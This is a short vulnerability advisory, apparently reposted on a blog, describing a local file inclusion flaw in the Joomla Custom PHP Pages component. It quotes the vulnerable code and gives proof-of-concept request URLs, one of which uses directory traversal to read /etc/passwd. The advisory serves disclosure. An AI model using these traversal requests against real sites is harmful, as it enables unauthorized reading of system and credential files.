Joomla Custom PHP Pages Component LFI Vulnerability
===================================================== |
- Discovered by : Chip D3 Bi0s |
- Email : chipdebios@gmail.com |
---------------------------------- |
Affected software description |
Application : Joomla Custom PHP Pages Component |
Email : gabe@fijiwebdesign.com |
Download : http://joomla-php.googlecode.com/files/com_php0.1alpha1-J15.tar.gz |
Joomla PHP Pages Component allows you to create simple PHP pages |
and link them to the Joomla Menu. This allows you to easily create |
a custom page without having to create a whole component. It is |
similar to the PHP Module for Joomla, except that it is a full Component. |
Some LFI vulnerabilities exist in Joomla Custom PHP Pages Component. |
The bug is in the following files, specifying the lines |
/components/com_php/php.php |
[35] $filename = $Params->get('file', ''); |
[36] $path = JPATH_ROOT.'/components/com_php/files/'.$filename; |
[49] if (is_file($path)) { |
[52] echo '<span>Please choose a File</span>'; |
Explaining the above lines: |
According to the code that files are opened, but the code is not |
shows no filtration, so we can move into |
directories. According to several extensions can be observed as |
.html, .jpg, .js, which is not true of all .php |
http://127.0.0.1/index.php?option=com_php&file=../images/phplogo.jpg |
http://127.0.0.1/index.php?option=com_php&file=../js/ie_pngfix.js |
http://127.0.0.1/index.php?option=com_php&file=../../../../../../../../../../etc/passwd |
+++++++++++++++++++++++++++++++++++++++ |
[!] Produced in South America |
+++++++++++++++++++++++++++++++++++++++
Post Published: 12 May 2010
Author: Georges Kut
Found in section:
exploit
Tags: joomla
![Joomla Component XOBBIX [prodid] SQL Injection Vulnerability](http://news.dreamings.org/wp-content/themes/news-magazine-theme-640/cropper.php?src=http://news.dreamings.org/wp-content/uploads/2010/02/Coffee-Time-150x150.png&h=50&w=50&zc=1&q=95)